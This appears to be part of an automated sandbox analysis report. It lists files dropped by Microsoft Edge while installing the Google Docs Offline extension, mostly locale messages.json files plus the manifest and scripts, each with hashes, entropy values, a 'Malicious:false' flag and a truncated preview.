                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1941
                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1969
                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1674
                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1063
                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1333
                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1263
                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1074
                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):879
                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1205
                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):843
                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):912
                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):18518
                                                                                                                                          Entropy (8bit):5.708460608391745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:cLjrY6QDAwrlbs3jiD1DisLSFqwAqmq90QH:2jrSHbMjidLSFxA+0QH
                                                                                                                                          MD5:F1346F53663087A18F734B324E159F65
                                                                                                                                          SHA1:A1A79C373D154E6630DE9D46FD8902C0F6ACB860
                                                                                                                                          SHA-256:8A65785DEEBA93A107A2FE5060305873A40379CD8B2B848607DDE45ED9130E03
                                                                                                                                          SHA-512:FB6B92BEA01BF399D981260966A419AE328CAE7331970FED90DC9D158403B75F07ED1A7740771B56411E3730C946F831E2B1788B5A22E3139F17670FC9C7E48F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiOE1xa2JXMkFQWkVpbzlQTHlYNVItT3o1bGs5a29sbnlWTWtvYlVabk15YyIsInBhdGgiOiJfbG9jYWxlcy9hZi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoicWhJZ1d4Q0hVTS1mb0plRVlhYllpQjVPZ05vZ3FFYllKTnBBYWRuSkdFYyJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiV0E0cW96b3R5ZzJrcUpKU0FEYWNVMGNDbEdJYjlmMmp1ejhYalh0YUhybyIsInBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWk9BYndwSzZMcUZwbFhiOHhFVTJjRWRTRHVpVjRwRE03aURDVEpNMjJPOCJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiQlk4QVRlUUktWHNqLWFSbVZfTi03dHVzUlJyQUNkU25yU3NhT2d3R3pTWSIsInBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiX0pLU3pRcGk4TVczZE5WZldwN281STVjX09

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):854
                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\eventpage_bin_prod.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:ASCII text, with very long lines (3422)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):82340
                                                                                                                                          Entropy (8bit):5.380000995741104
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:1HejtmLJVlfF5z4d+3CNOzcheJm39n3p1jWctudKRwbbwuL:tVIfczcMmhDBt+L
                                                                                                                                          MD5:4902A531B4D907B2B81AF35251CADF2C
                                                                                                                                          SHA1:7875EE813923CB16B0F0C4DE3C49C08C85CE52A1
                                                                                                                                          SHA-256:C3CE23C47225A594425A1290E49CED80FF9F3360D787767B6C45C80314FCF666
                                                                                                                                          SHA-512:A7B8E713F33B1155D8D45B8B635B318262EA21F3D0856FA0409ED6636F84CB9E38B78FB0E0296C3A253953FBFBF11FD68AF6C5EDB00A17A90A9129161CCDC7EE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:'use strict';function m(){return function(){}}var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ca(this);function t(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g){this.g=f;ba(this,"description",{configurable:!

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\manifest.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2397
                                                                                                                                          Entropy (8bit):5.423775942969832
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HEZ4qW4VlELb/KxktGu7VwELb/s2QDkUpvdlmF1exy/Otj19SVvs:W7WsaLTKQGuxTLT2Rv3mves/OP9SVk
                                                                                                                                          MD5:C2CFE399D41AD342B3ECDE0211F98725
                                                                                                                                          SHA1:345AB6BA0CB69246F480AE4273F68869AC8011DA
                                                                                                                                          SHA-256:DB3991C5788FC6968DF25180898EF42AD974192DFE0AED4E12969219A1EB8565
                                                                                                                                          SHA-512:CEE1AB92EED7169C33BBDA701FA56EF850705B3F2AE802E772ABF870837022671F06EBA69DED628AF868DB827871CCBF3F551FCEF201041EEABF89ADAA546FB7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "persistent": false,.. "scripts": [ "eventpage_bin_prod.js" ].. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": "script-src 'self'; object-src 'self'",.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "matches": [ "htt

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\page_embed_script.js

